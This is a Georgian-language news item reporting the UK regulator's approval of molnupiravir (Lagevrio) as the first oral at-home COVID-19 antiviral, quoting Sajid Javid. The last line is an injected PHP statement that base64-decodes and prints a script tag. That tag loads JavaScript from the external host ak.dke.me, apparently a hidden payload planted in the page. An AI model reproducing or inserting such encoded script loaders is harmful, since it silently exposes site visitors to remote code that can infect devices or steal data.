celsiusi
ავერსი შნაიდერი
დიდ ბრიტანეთში, მედიცინისა და ჯანდაცვის პროდუქტების რეგულაციის სააგენტომ დაამტკიცა პირველი აბი, რომელიც კორონავირუსის სიმპტომებს კურნავს. ინფორმაცია, დიდი ბრიტანეთის მთავრობის გვერდზე ვრცელდება.
 
ლაგევრიო, იგივე მოლნუპირავირი, მსოფლიოში კორონავირუსის საწინააღმდეგო პირველი მედიკამენტია, რომლის მიღებაც სახლში, ტაბლეტის სახით, პირის ღრუდან შეიძლება და არა მაგალითად, ინექციის გზით.
 
"დღეს ჩვენი ქვეყნისთვის ისტორიული დღეა, რადგან დიდი ბრიტანეთი მსოფლიოში პირველი ქვეყანაა, რომელმაც დაამტკიცა ანტივირუსული მედიკამენტი, რომლის მიღებაც კორონავირუსის სამკურნალოდ სახლშიც შეიძლება" , - ამბობს დიდი ბრიტანეთის ჯანდაცვისა და სოციალური საკითხების მდივანი საჯიდ ჯავიდი.
855
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");